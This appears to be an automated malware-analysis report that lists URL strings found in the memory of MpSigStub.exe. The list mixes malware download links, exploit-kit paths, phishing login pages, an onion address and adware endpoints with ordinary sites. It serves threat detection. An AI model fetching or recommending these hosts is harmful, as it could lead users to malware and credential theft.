Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://down.firmsoar.com/Fastaide_1160.exe
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://down.kuwo.cn/mbox/kuwo_jm634.exe
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://down.namepics.info/install.php?name=
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://down2.uc.cn/pcbrowser/down.php?pid=4396
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://download-n-save.com
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://download-the-files.com/tplc/cdc
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://download.%s.com%s&u=%u&advid=00000000&p=%u
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://download.%s.com/
Source: MpSigStub.exe, 00000026.00000003.18307265419.00000138BE9EC000.00000004.00000001.sdmp	String found in binary or memory: http://download.%s.com/124.php?&advid=00000
Source: MpSigStub.exe, 00000026.00000003.18307265419.00000138BE9EC000.00000004.00000001.sdmp	String found in binary or memory: http://download.%s.com/madownload.php?&advid=00000000&u=%u&p=%u&lang=______
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://download.3721.com/download/CnsMinExM.ini
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://download.3721.com/download/CnsMinUp
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://download.contextplus.net/shared/Msvcp60Installer.exe
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://download.cpudln.com
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://download.driverupdate.net/DriverUpdate-setup.msi.bz2x
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://download.enativ.com/nativ_v4.exe
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://download.enet.com.cn/search.php?keyword=%s
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://download.kaobeitu.com/kaobeitu/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://download.m
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://download.phpnuke.org/installers/extra_software/coupish/coupish-x
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://download.powercreator
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://download.seznam.cz/update
Source: MpSigStub.exe, 00000026.00000003.18307265419.00000138BE9EC000.00000004.00000001.sdmp	String found in binary or memory: http://download.spy-shredder.com/ssdownload.php?&advid=00001322&u=%u&p=%u&lang=________&vs=%u&%s
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://download.websearch.com/Dnl/T_
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://download.websearch.com/Tb
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://download.websearch.com/dnl/T
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://download.zhongsou.com/cdsearch/
Source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp	String found in binary or memory: http://download.zhongsou.com/msstat/dealip.asp?aa=%s&bb=%s&cc=%s&dd=%s&ee=%d&ff=%ld&gg=%
Source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp	String found in binary or memory: http://download.zhongsou.com/routeway/dealsetup.asp?aa=%s&bb=%s&cc=%s&dd=%s
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://download.zjsyawqj.cn/jjbq/setup_jjbq_jjbq03nodkpk_v1.0_silent.exe
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://download1.microliteupdate.net/
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://download2.mybrowserbar.com/kits/hlp/exthelper.exe
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://downloader.aldtop.com
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://downloadfile.xyz/mine/run.js
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://downloadfilesldr.com/allfile.jpg
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://downloadfilesldr.com/index2.php?adv=141
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://downloadfilesldr.com/index3.php?adv=141
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://downloadfilesldr.com/index4.php?adv=141
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://downloadfilesldr.com/index5.php?adv=141
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://downloads.180solutions.com/
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	String found in binary or memory: http://downza.cn
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://dqbdesign.com/wp-admin/cu_sa/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://dr-woelfl.de/invoice-for-you/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://driversearch.space
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://drm.ysbweb.com/v1.aspx?id=65181__asf_license_url_ends_here__
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://dropboxservices.isaihost.com/dropbox/drop/dropbox.html)
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://drpuneetchawla.com/cli/adbe/login.html
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://dtrack.secdls.com
Source: MpSigStub.exe, 00000026.00000003.18348332135.00000138BE958000.00000004.00000001.sdmp	String found in binary or memory: http://dudethisishowwedoitallnightlong.2myip.net
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://duhjhv.ftp1.biz/ip/stat.php
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://dvd2ipad.net/media2
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://dw.mtsou.com/
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://dw.mtsou.com/_
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://dx.mastacash.com
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://dz-site.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://e223pg.awardspace.co.uk/up.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://eastman.smritiphotography.in/#ywhvzgdlc0blyxn0bwfulmnvbq==
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://ebsuggester.com/redirect-new-logon-alert/redirect.htm
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://economycrown.com/hahdhdhd/sf-express.php?email=
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://eda.ru/data
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://eduardovolpi.com.br/flipbook/postal/services/parcel)
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://educadorfisicoadinis.com.br/ryan/login%20pdf.html)/type/action/s/uri
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://efficientlifechurch.com/.well-known/pki-validation/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://ekey.sdo.com
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://eleonorepack.cn/myexp/getexe.php?spl=javadmjava/io/bufferedoutputstreamjava/io/fileoutputstre
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	String found in binary or memory: http://elsword.com/xb
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://employeeportal.net-login.com/
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: http://en.aa.com
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://en.eazel.com/
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://en.v9.com/
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://en.v9.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 00000026.00000003.18306892097.00000138BD524000.00000004.00000001.sdmp	String found in binary or memory: http://endresactuarial.com/
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://engine.dmccint.com/common/ProcessDump.exe?v=1.0.3.0x
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://ermi.co.zw/ds/2312.gif
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://errors.crossrider.com/utility.gif
Source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	String found in binary or memory: http://errors.statsmyapp.com
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://errors.statsmyapp.com/installer-error.gif?action=wrapper
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://errors.statsmyapp.com/installer-error.gif?action=wrapperxk
Source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	String found in binary or memory: http://errors.statsmyapp.comxa
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://escritorioharpia.com/wp-content/upgrade/resume.php?id=
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://esiglass.it/glassclass/glass.php
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://esmxc01.top/download.php?file=lv.exe
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://esp1k.myddns.me/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://estelaraziel.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	String found in binary or memory: http://etzhb.000webhostapp.com/read.txt
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://eula.mindspark.com
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://evanstechnology.com
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://events.bittorrent.com/startConversion
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://everbot.pl/cs/reg.php?id=
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://ewd96h2.sed.macabrepoe.com
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://excelvba.ru/updates/download.php?addin=Parser
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://exe-1.icu/install2.exe
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://expandingdelegation.top/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://experimental.sitesled.com/wind.jpg
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://explorehere.in/info/new-invoice-
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://f0568929.xsph.ru/po/rexifly.php?
Source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp	String found in binary or memory: http://f0570495.xsph.ru/files/pdf.php
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://f1visa.info/cd/cd.php?id=%s&ver=g
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://faacebookv.tk/reveal.php
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://facebegen.com/dexport/ajax.php
Source: MpSigStub.exe, 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp	String found in binary or memory: http://faisdodo.info/sbuild1.exe
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://faithhotelghana.com
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://fantastico.globo.com/jornalismo/fant/
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://fateh.aba.ae/abc.zip
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://fateh.aba.ae/xyzx.zip
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://fbcores.info/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://feed.helperbar.com
Source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp	String found in binary or memory: http://fei-coder.com/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://fen0men.info/exp/index.php
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://festival23234.com/flash.php?mode=1
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://fgrss.com/?referrer=c3rob3jhdeblyxn0bwfulmnvbq==
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://fhayazilim.com/wp-admin/
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://fibrassolpiscinas.com.br/wp-content/upgrabe/
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://file.sidetab.co.kr/dst/WallTab_
Source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp	String found in binary or memory: http://files.getpricefinder.com/install/ie/pricefinderpackage.zip
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: http://finance.yahoo.com/
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://finanzen-netto.de
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://find.verycd.com/folders?cat=movie&kw=%s
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://fineartconsult.be/gallery/index.php?email=
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://firefoxstabs.com/
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://fixdoctorsfirst.net/registry/andyfkz.png?bg=sp14
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://flash.chinaren.com/ip/ip.php
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://flashupd.com/mp3/in
Source: MpSigStub.exe, 00000026.00000003.18311122933.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://fmforums.com/wggx991264/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://foo.w97.cn/SoftInterFace/SearchNum.aspx
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://foo.w97.cn/data/file/kwbuf.ini
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://forkasimov.hopto.org/beau/updates.html/f
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://forkasimov.hopto.org/pursue/updates.html/f
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://forms.newlifeadmin.org
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://foundation.shanto-mariamfoundation.org/24.gif
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://foxxpriv.ru/pic1/index.php
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://foxy.divarug.com:8080/yahoo.js
Source: MpSigStub.exe, 00000026.00000003.18292462058.00000138BDF8A000.00000004.00000001.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://frame.crazywinnings.com/scripts/protect.php?promo
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: http://freeimagehost.ru/ubanner.png
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://freevideoz.info/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://fu.o3sb.com:9999/img.jpg
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: http://funsiteshere.com/
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://funsiteshere.com/redir.php
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://futebolclubesantacruz.com.br/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://futureweighed.ae.am/showthread.php?t=731756
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://g.delyemo.ru
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: http://g1.globo.com/Noticias/SaoPaulo/0
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://gaigoixxx.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://galinasergeeva.ru
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	String found in binary or memory: http://galleries.payserve.com/1/31952/1
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://gallerydating.net
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://games.enet.com.cn/article/SearchCategory.php?key=%s
Source: MpSigStub.exe, 00000026.00000003.18350786721.00000138BD66E000.00000004.00000001.sdmp	String found in binary or memory: http://gathome.com/cgi-bin/first.pl
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://gd-sirve.com/rb.txt
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://gdcbmuveqjsli57x.onion/b93cf40ee63ed066
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	String found in binary or memory: http://ge.tt/api/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://geezybeatz.com/secured/index.html)
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://geocities.com/jobreee/main.htm
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://geocities.yahoo.com.br/youtoba03/listaaut.jpg
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://geros.freedynamicdns.org/bin/key.html/f
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://get.file136desktop.info/DownloadManager/Get?p=638x
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://getfreez.net/multi-codec-pack.php
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://getp.jujutang.com
Source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp	String found in binary or memory: http://getsyncer5.info/sync/?ext=bcool&pid=26&country=us
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://getvolkerdns.co.cc/priv8
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://getwebcake.com/Privacy
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://getyouneed.co
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://getyouneed.coa
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://getyouneed.com
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://getyouneed.com/r.php?wm=5
Source: MpSigStub.exe, 00000026.00000003.18348332135.00000138BE958000.00000004.00000001.sdmp	String found in binary or memory: http://gg.pw
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: http://ghsinternationalconferencewithinternationalfilesecureserviceglo.ydns.eu
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://gicia.info/cd/cd.php?id=%s&ver=g
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://gkfaalkhnkqvgjntywc.ml/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000026.00000003.18342149722.00000138BDE2C000.00000004.00000001.sdmp	String found in binary or memory: http://globonoticia.iitalia.com/noticia.com
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://go.58.com/?f=
Source: MpSigStub.exe, 00000026.00000003.18348332135.00000138BE958000.00000004.00000001.sdmp	String found in binary or memory: http://go.jetswap.com/ssflang.php?it=4893473
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://go.secureclick6.com/0534
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://gogglgdoc.com/document/review/index.html)
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://gogo.ru/go?x;
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://golden-toto.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/0ma6okopenhttp://goo.gl/0ma6okerror
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/9mrcts
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/bw14po
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://goo.gl/x7a4lcshowwebinpopuptaskkill-f-im
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://google-adsenc.com/in.cgi?
Source: MpSigStub.exe, 00000026.00000003.18341846775.00000138BCF56000.00000004.00000001.sdmp	String found in binary or memory: http://google.com
Source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp	String found in binary or memory: http://google.com/
Source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp	String found in binary or memory: http://google.com/ID
Source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp	String found in binary or memory: http://google.com/install.php?time=%d
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://google.ru/js
